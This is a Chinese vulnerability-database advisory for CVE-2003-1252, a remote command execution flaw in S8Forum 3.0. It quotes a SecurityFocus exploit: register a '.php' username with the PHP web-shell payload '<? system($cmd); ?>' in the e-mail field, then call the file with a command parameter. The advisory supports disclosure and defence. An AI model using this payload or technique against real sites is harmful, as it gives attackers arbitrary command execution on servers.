S8Forum远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107149 漏洞类型 输入验证
发布时间 2003-01-06 更新时间 2006-01-17
CVE编号 CVE-2003-1252 CNNVD-ID CNNVD-200312-375
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-375
|漏洞详情
S8Forum3.0版本的register.php存在漏洞。远程攻击者可以通过创建一个名称以.php拓展名结尾的用户以及输入E-mail字段需要的命令来执行任意PHP命令,该漏洞创建了一个可被攻击者调用的web-accessible.php文件,正如使用带有"any_name.php"用户名的"system($cmd)"电子邮件地址。
|漏洞EXP
source: http://www.securityfocus.com/bid/6547/info

S8Forum is prone to a remote command execution vulnerability.

When a user registers with the forum, a file is created locally with the specified username. The contents of this file will be the data entered by the user. As a result, a malicious user could create a file with an arbitrary name and PHP (.php) extension that contains valid PHP code. The attacker may then cause this file to be executed by requesting it via HTTP. 

- go to Register

- insert in Username:
any_name.php

- in password : any_pasword.

- in E-Mail:

<? system($cmd); ?>

Then request the following page:

http://www.example.com/s8forumfolder/users/any_name.php?cmd=uname%20-a
|参考资料

来源:BID
名称:6547
链接:http://www.securityfocus.com/bid/6547
来源:BUGTRAQ
名称:20030105AsecurityvulnerabilityinS8Forum
链接:http://www.securityfocus.com/archive/1/305406
来源:XF
名称:s8forum-register-command-execution(10974)
链接:http://www.iss.net/security_center/static/10974.php
来源:VULNWATCH
名称:20030105AsecurityvulnerabilityinS8Forum
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0004.html
来源:SECTRACK
名称:1005881
链接:http://www.securitytracker.com/id?1005881
来源:SECUNIA
名称:7819
链接:http://secunia.com/advisories/7819